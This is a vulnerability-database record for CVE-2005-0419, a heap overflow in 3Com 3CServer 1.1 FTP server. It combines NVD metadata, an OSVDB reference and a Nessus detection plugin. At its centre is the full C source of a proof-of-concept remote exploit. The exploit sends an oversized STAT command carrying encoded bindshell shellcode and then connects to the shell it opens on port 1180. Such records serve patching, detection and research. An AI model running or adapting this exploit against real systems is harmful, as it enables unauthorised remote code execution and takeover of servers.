ID CVE-2005-0419Type cveReporter cve@mitre.orgModified 2017-07-11T01:32:00
Description
Multiple heap-based buffer overflows in 3Com 3CServer allow remote authenticated users to execute arbitrary code via long FTP commands, as demonstrated using the STAT command.
{"id": "CVE-2005-0419", "bulletinFamily": "NVD", "title": "CVE-2005-0419", "description": "Multiple heap-based buffer overflows in 3Com 3CServer allow remote authenticated users to execute arbitrary code via long FTP commands, as demonstrated using the STAT command.", "published": "2005-04-27T04:00:00", "modified": "2017-07-11T01:32:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-0419", "reporter": "cve@mitre.org", "references": ["https://exchange.xforce.ibmcloud.com/vulnerabilities/19250", "http://marc.info/?l=bugtraq&m=110780306326130&w=2"], "cvelist": ["CVE-2005-0419"], "type": "cve", "lastseen": "2019-05-29T18:08:13", "history": [], "edition": 1, "hashmap": [{"key": "affectedSoftware", "hash": "01f3a8ec6a64d23a6285f87a9976dc2d"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "9c8a49844a45adfcbee117f178c7d26d"}, {"key": "cpe23", "hash": "f3bbda9a54b1272c5d1246007b8bfeca"}, {"key": "cvelist", "hash": "8be72407771a35133a649963a7278a83"}, {"key": "cvss", "hash": "0b053db5674b87efff89989a8a720df3"}, {"key": "cvss2", "hash": "7f7c77d2dde7216a66d00321bd5828f8"}, {"key": "cvss3", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cwe", "hash": "78a7a5cbaf09985c14389298e454e7db"}, {"key": "description", "hash": "7b886f8a5204a309e4e160bae20cf80d"}, {"key": "href", "hash": "4576f27c1f2cd8fda8ee45d4dfdff642"}, {"key": "modified", "hash": "83de1fd34ae7439525b2c7f78002fac2"}, {"key": "published", "hash": "ef00c67a5c01b8e51692143987db9fcf"}, {"key": "references", "hash": "1d507ed9f90463fa6e925fe96d426ed9"}, {"key": "reporter", "hash": "444c2b4dda4a55437faa8bef1a141e84"}, {"key": "title", "hash": "a2836f1582308da367bcb7040f5e1812"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "1fa9ec7fb635f869ebed6c7e1f7ef505238571d2a49e9fdf670eb8c3bd150f3d", "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "osvdb", "idList": ["OSVDB:13703"]}, {"type": "exploitdb", "idList": ["EDB-ID:794"]}, {"type": "nessus", "idList": ["3COM_3CSERVER_FTP_OVERFLOW.NASL"]}], "modified": "2019-05-29T18:08:13"}, "score": {"value": 8.2, "vector": "NONE", "modified": "2019-05-29T18:08:13"}, "vulnersScore": 8.2}, "objectVersion": "1.3", "cpe": ["cpe:/a:3com:3cserver:1.1"], "affectedSoftware": [{"name": "3com 3cserver", "operator": "eq", "version": "1.1"}], "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": true, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {}, "cpe23": ["cpe:2.3:a:3com:3cserver:1.1:*:*:*:*:*:*:*"], "cwe": ["NVD-CWE-Other"]}
{"exploitdb": [{"lastseen": "2016-01-31T12:52:39", "bulletinFamily": "exploit", "description": "3CServer 1.1 FTP Server Remote Exploit. CVE-2005-0419. Remote exploit for windows platform", "modified": "2005-02-07T00:00:00", "published": "2005-02-07T00:00:00", "id": "EDB-ID:794", "href": "https://www.exploit-db.com/exploits/794/", "type": "exploitdb", "title": "3CServer 1.1 FTP Server Remote Exploit", "sourceData": "/*\r\n\r\nsubject:\tProof of Concept exploit for 3CServer v1.1 FTP server\r\nvendor:\t\t3Com, http://support.3com.com/software/utilities_for_windows_32_bit.htm\r\n`date`:\t\tMon Feb 7 18:10:01 2005\r\nnotes:\t\tuniversal offset, SEH ptr overwriting with variation\r\nauthor:\t\tmandragore, mandragore@turingtest@gmail.com\r\n\r\n*/\r\n\r\n#include <stdio.h>\r\n#include <strings.h>\r\n#include <signal.h>\r\n#include <netdb.h>\r\n#include <sys/socket.h>\r\n#include <netinet/in.h>\r\n\r\n#define NORM \"\\033[00;00m\"\r\n#define GREEN \"\\033[01;32m\"\r\n#define YELL \"\\033[01;33m\"\r\n#define RED \"\\033[01;31m\"\r\n\r\n#define BANNER GREEN \"[%%] \" YELL \"mandragore's sploit v1.0 for \" RED \"3CServer v1.1.007\" NORM\r\n\r\n#define fatal(x) { perror(x); exit(1); }\r\n\r\n#define default_port 21\r\n#define default_user \"anonymous\"\r\n#define default_pass \"weak@3com.com\"\r\n\r\n#define GPA 0x0045b968\r\n#define LLA 0x0045b964\r\n\r\n#define offset 0x418A19\t// call eax\r\n\r\nunsigned char bsh[]={\r\n// 198 bytes, iat's gpa at 0x1a, iat's lla at 0x2b, port at 0x46 (1180), key 0xde\r\n0xEB,0x0F,0x8B,0x34,0x24,0x33,0xC9,0x80,0xC1,0xB0,0x80,0x36,0xDE,0x46,0xE2,0xFA,\r\n0xC3,0xE8,0xEC,0xFF,0xFF,0xFF,0xBA,0x57,0xD7,0x60,0xDE,0xFE,0x9E,0xDE,0xB6,0xED,\r\n0xEC,0xDE,0xDE,0xB6,0xA9,0xAD,0xEC,0x81,0x8A,0x21,0xCB,0xDA,0xFE,0x9E,0xDE,0x49,\r\n0x47,0x8C,0x8C,0x8C,0x8C,0x9C,0x8C,0x9C,0x8C,0xB4,0x90,0x89,0x21,0xC8,0x21,0x0E,\r\n0x4D,0xB4,0xDE,0xB6,0xDC,0xDE,0xDA,0x42,0x55,0x1A,0xB4,0xCE,0x8E,0x8D,0xB4,0xDC,\r\n0x89,0x21,0xC8,0x21,0x0E,0xB4,0xDF,0x8D,0xB4,0xD3,0x89,0x21,0xC8,0x21,0x0E,0xB4,\r\n0xDE,0x8A,0x8D,0xB4,0xDF,0x89,0x21,0xC8,0x21,0x0E,0x55,0x06,0xED,0x1E,0xB4,0xCE,\r\n0x87,0x55,0x22,0x89,0xDD,0x27,0x89,0x2D,0x75,0x55,0xE2,0xFA,0x8E,0x8E,0x8E,0xB4,\r\n0xDF,0x8E,0x8E,0x36,0xDA,0xDE,0xDE,0xDE,0xBD,0xB3,0xBA,0xDE,0x8E,0x36,0xD1,0xDE,\r\n0xDE,0xDE,0x9D,0xAC,0xBB,0xBF,0xAA,0xBB,0x8E,0xAC,0xB1,0xBD,0xBB,0xAD,0xAD,0x9F,\r\n0xDE,0x18,0xD9,0x9A,0x19,0x99,0xF2,0xDF,0xDF,0xDE,0xDE,0x5D,0x19,0xE6,0x4D,0x75,\r\n0x75,0x75,0xBA,0xB9,0x7F,0xEE,0xDE,0x55,0x9E,0xD2,0x55,0x9E,0xC2,0x55,0xDE,0x21,\r\n0xAE,0xD6,0x21,0xC8,0x21,0x0E\r\n};\r\n\r\nchar verbose=0;\r\n\r\nstatic void start(void) __attribute__ ((constructor));\r\n\r\nvoid start() {\r\n\tint gpa=GPA^0xdededede, lla=LLA^0xdededede;\r\n\tmemcpy(bsh+0x1a,&gpa,4);\r\n\tmemcpy(bsh+0x2b,&lla,4);\r\n}\r\n\r\nint readcrap(int s) {\r\n\tstruct timeval tv;\r\n\tfd_set fds;\r\n\tint ret;\r\n\tchar buff[1024];\r\n\r\n\tFD_ZERO(&fds);\r\n\tFD_SET(s,&fds);\r\n\r\n\tbzero(buff,sizeof(buff));\r\n\r\n\twhile (1) {\r\n\t\ttv.tv_sec=1;\r\n\t\ttv.tv_usec=0;\r\n\t\tif ( ret=select(s+1, &fds, NULL, NULL, (struct timeval *)&tv) < 0 )\r\n\t\t\tbreak;\r\n\t\tif (FD_ISSET(s,&fds)) {\r\n\t\t\t// something to read\r\n\t\t\tif ( read(s,buff,sizeof(buff),0) < 1 )\r\n\t\t\t\tbreak;\r\n\t\t} else {\r\n\t\t\t// timeout\r\n\t\t\treturn 1;\r\n\t\t}\r\n\t}\r\n\r\n\treturn 0; // something went bad\r\n}\r\n\r\nvoid usage(char *argv0) {\r\n\tint i;\r\n\r\n\tprintf(\"%s -d <host/ip> [opts]\\n\\n\",argv0);\r\n\r\n\tprintf(\"Options:\\n\");\r\n\tprintf(\" -h undocumented\\n\");\r\n\tprintf(\" -u user [default: \" default_user \"]\\n\");\r\n\tprintf(\" -p pass [default: \" default_pass \"]\\n\");\r\n\tprintf(\" -P <port> for the shellcode [default: 1180]\\n\");\r\n\r\n\texit(1);\r\n}\r\n\r\nvoid shell(int s) {\r\n\tchar buff[4096];\r\n\tint retval;\r\n\tfd_set fds;\r\n\r\n\tprintf(\"[+] connected!\\n\\n\");\r\n\r\n\tfor (;;) {\r\n\t\tFD_ZERO(&fds);\r\n\t\tFD_SET(0,&fds);\r\n\t\tFD_SET(s,&fds);\r\n\r\n if (select(s+1, &fds, NULL, NULL, NULL) < 0)\r\n\t\t\tfatal(\"[-] shell.select()\");\r\n\r\n\t\tif (FD_ISSET(0,&fds)) {\r\n\t\t\tif ((retval = read(1,buff,4096)) < 1)\r\n\t\t\t\tfatal(\"[-] shell.recv(stdin)\");\r\n\t\t\tsend(s,buff,retval,0);\r\n\t\t}\r\n\r\n\t\tif (FD_ISSET(s,&fds)) {\r\n\t\t\tif ((retval = recv(s,buff,4096,0)) < 1)\r\n\t\t\t\tfatal(\"[-] shell.recv(socket)\");\r\n\t\t\twrite(1,buff,retval);\r\n\t\t}\r\n\t}\r\n}\r\n\r\nint main(int argc, char **argv, char **env) {\r\n\tstruct sockaddr_in sin;\r\n\tstruct hostent *he;\r\n\tchar *host; int port=default_port;\r\n\tchar *Host; int Port=1180; char bindopt=1;\r\n\tint i,s;\r\n\tchar *buff, *jmpback=\"\\xe9\\x35\\xff\\xff\\xff\";\r\n\tchar *user=default_user; char *pass=default_pass;\r\n\r\n\tprintf(BANNER \"\\n\");\r\n\r\n\tif (argc==1)\r\n\t\tusage(argv[0]);\r\n\r\n\tfor (i=1;i<argc;i+=2) {\r\n\t\tif (strlen(argv[i]) != 2)\r\n\t\t\tusage(argv[0]);\r\n\r\n\t\tswitch(argv[i][1]) {\r\n\t\t\tcase 'd':\r\n\t\t\t\thost=argv[i+1];\r\n\t\t\t\tbreak;\r\n\t\t\tcase 'u':\r\n\t\t\t\tuser=argv[i+1];\r\n\t\t\t\tbreak;\r\n\t\t\tcase 'p':\r\n\t\t\t\tpass=argv[i+1];\r\n\t\t\t\tbreak;\r\n\t\t\tcase 'P':\r\n\t\t\t\tPort=atoi(argv[i+1])?:1180;\r\n\t\t\t\tPort=Port ^ 0xdede;\r\n\t\t\t\tPort=(Port & 0xff) << 8 | Port >>8;\r\n\t\t\t\tmemcpy(bsh+0x46,&Port,2);\r\n\t\t\t\tPort=Port ^ 0xdede;\r\n\t\t\t\tPort=(Port & 0xff) << 8 | Port >>8;\r\n\t\t\t\tbreak;\r\n\t\t\tcase 'v':\r\n\t\t\t\tverbose++; i--;\r\n\t\t\t\tbreak;\r\n\t\t\tcase 'h':\r\n\t\t\t\tusage(argv[0]);\r\n\t\t\tdefault:\r\n\t\t\t\tusage(argv[0]);\r\n\t\t\t}\r\n\t}\r\n\r\n\tif (verbose)\r\n\t\tprintf(\"verbose!\\n\");\r\n\r\n\tif ((he=gethostbyname(host))==NULL)\r\n\t\tfatal(\"[-] gethostbyname()\");\r\n\r\n\tsin.sin_family = 2;\r\n\tsin.sin_addr = *((struct in_addr *)he->h_addr_list[0]);\r\n\tsin.sin_port = htons(port);\r\n\r\n\tprintf(\"[.] launching attack on %s:%d..\\n\",inet_ntoa(*((struct in_addr *)he->h_addr_list[0])),port);\r\n\tprintf(\"[.] will try to put a bindshell on port %d.\\n\",Port);\r\n\r\n// -------------------- core\r\n\r\n\ts=socket(2,1,6);\r\n\r\n\tif (connect(s,(struct sockaddr *)&sin,16)!=0)\r\n\t\tfatal(\"[-] connect()\");\r\n\r\n\tprintf(\"[+] connected, sending exploit\\n\");\r\n\r\n\tbuff=(char *)malloc(4096);\r\n\tbzero(buff,4096);\r\n\r\n\treadcrap(s);\r\n\tsprintf(buff,\"USER %s\\r\\n\",user);\r\n\tsend(s,buff,strlen(buff),0);\r\n\treadcrap(s);\r\n\tsprintf(buff,\"PASS %s\\r\\n\",pass);\r\n\tsend(s,buff,strlen(buff),0);\r\n\treadcrap(s);\r\n\r\n\tbzero(buff,sizeof(buff));\r\n\tstrcpy(buff,\"STAT \");\r\n\tmemset(buff+5,0x41,2000);\r\n\tmemcpy(buff+5+0x571-strlen(bsh),&bsh,strlen(bsh));\r\n\tmemcpy(buff+5+0x571,jmpback,strlen(jmpback));\r\n\ti=offset;\r\n\tmemcpy(buff+5+0x5d9,&i,4);\r\n\r\n\tsend(s,buff,strlen(buff),0);\r\n\treadcrap(s);\r\n\r\n\tfree(buff);\r\n\r\n\tclose(s);\r\n\r\n// -------------------- end of core\r\n\r\n\tsin.sin_port = htons(Port);\r\n\tsleep(1);\r\n\ts=socket(2,1,6);\r\n\tif (connect(s,(struct sockaddr *)&sin,16)!=0)\r\n\t\tfatal(\"[-] exploit most likely failed\");\r\n\tshell(s);\r\n\r\n\texit(0);\r\n}\n\n// milw0rm.com [2005-02-07]\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/794/"}], "osvdb": [{"lastseen": "2017-04-28T13:20:09", "bulletinFamily": "software", "description": "# No description provided by the source\n\n## References:\nVendor URL: http://support.3com.com/software/utilities_for_windows_32_bit.htm\nSecurity Tracker: 1013131\n[Nessus Plugin ID:16321](https://vulners.com/search?query=pluginID:16321)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-02/0008.html\n[CVE-2005-0419](https://vulners.com/cve/CVE-2005-0419)\n", "modified": "2005-02-07T09:19:26", "published": "2005-02-07T09:19:26", "href": "https://vulners.com/osvdb/OSVDB:13703", "id": "OSVDB:13703", "title": "3Com 3CServer FTP Server Multiple Command Remote Overflow", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "nessus": [{"lastseen": "2019-02-21T01:08:21", "bulletinFamily": "scanner", "description": "The remote host is running the 3Com 3CServer or 3CDaemon FTP server. \n\nAccording to its banner, the version of the 3CServer / 3CDaemon FTP server on the remote host is reportedly affected by multiple buffer overflow and format string vulnerabilities as well as an information leak issue. An attacker may be able to exploit these flaws to execute arbitrary code on the remote host with the privileges of the FTP server, generally Administrator.", "modified": "2018-11-15T00:00:00", "id": "3COM_3CSERVER_FTP_OVERFLOW.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=16321", "published": "2005-02-08T00:00:00", "title": "3Com 3CServer/3CDaemon FTP Server Multiple Vulnerabilities (OF, FS, PD, DoS)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif(description)\n{\n script_id(16321);\n script_version (\"1.21\");\n\n script_cve_id(\"CVE-2005-0276\", \"CVE-2005-0277\", \"CVE-2005-0278\", \"CVE-2005-0419\");\n script_bugtraq_id(12155, 12463);\n \n script_name(english:\"3Com 3CServer/3CDaemon FTP Server Multiple Vulnerabilities (OF, FS, PD, DoS)\");\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote FTP server is affected by multiple issues.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running the 3Com 3CServer or 3CDaemon FTP server. \n\nAccording to its banner, the version of the 3CServer / 3CDaemon FTP\nserver on the remote host is reportedly affected by multiple buffer\noverflow and format string vulnerabilities as well as an information\nleak issue. An attacker may be able to exploit these flaws to execute\narbitrary code on the remote host with the privileges of the FTP\nserver, generally Administrator.\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/385969\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/389623\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Unknown at this time.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'3Com 3CDaemon 2.0 FTP Username Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2005/02/08\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2005/01/04\");\n script_cvs_date(\"Date: 2018/11/15 20:50:22\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_end_attributes();\n \n script_summary(english:\"Checks for 3Com 3CServer FTP Server\");\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2018 Tenable Network Security, Inc.\");\n script_family(english:\"FTP\");\n script_require_ports(\"Services/ftp\", 21);\n script_dependencies(\"ftpserver_detect_type_nd_version.nasl\");\n exit(0);\n}\n\n\ninclude(\"ftp_func.inc\");\n\nport = get_ftp_port(default:21);\n\nftpbanner = get_ftp_banner(port:port);\nif ( ftpbanner == NULL ) exit(1, \"No FTP banner on port \"+port+\".\");\nif ( egrep(pattern:\"^220 3Com FTP Server Version 1\\.[01]([^0-9]|\\.)\", string:ftpbanner) ||\n egrep(pattern:\"^220 3Com 3CDaemon FTP Server Version [0-2]\\.\", string:ftpbanner)) \n\tsecurity_hole(port);\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}
